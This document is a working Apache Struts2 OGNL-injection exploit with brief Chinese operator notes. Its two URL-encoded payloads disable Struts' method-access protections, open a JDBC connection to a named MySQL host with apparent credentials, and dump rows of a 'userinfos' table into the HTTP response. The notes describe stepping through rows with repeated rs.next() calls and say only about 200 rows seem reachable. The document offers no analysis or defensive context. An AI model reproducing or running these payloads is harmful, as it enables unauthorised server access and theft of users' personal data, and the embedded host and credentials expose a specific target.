('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i6)(('\43rs.next()')(d))&(i95)(('\43xman.getWriter().println(new\40java.lang.StringBuilder().append(\43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(2)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
第2条,是\43rs.next()%2b\43rs.next() 2个
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(i1)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\75@java.sql.DriverManager@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i6)(('\43rs.next()%2b\43rs.next()')(d))&(i95)(('\43xman.getWriter().println(new\40java.lang.StringBuilder().append(\43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(2)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
第3个是 3个。
第4个是 4个。\43rs.next()%2b\43rs.next()%2b\43rs.next()%2b\43rs.next()
貌似最多只能200多个。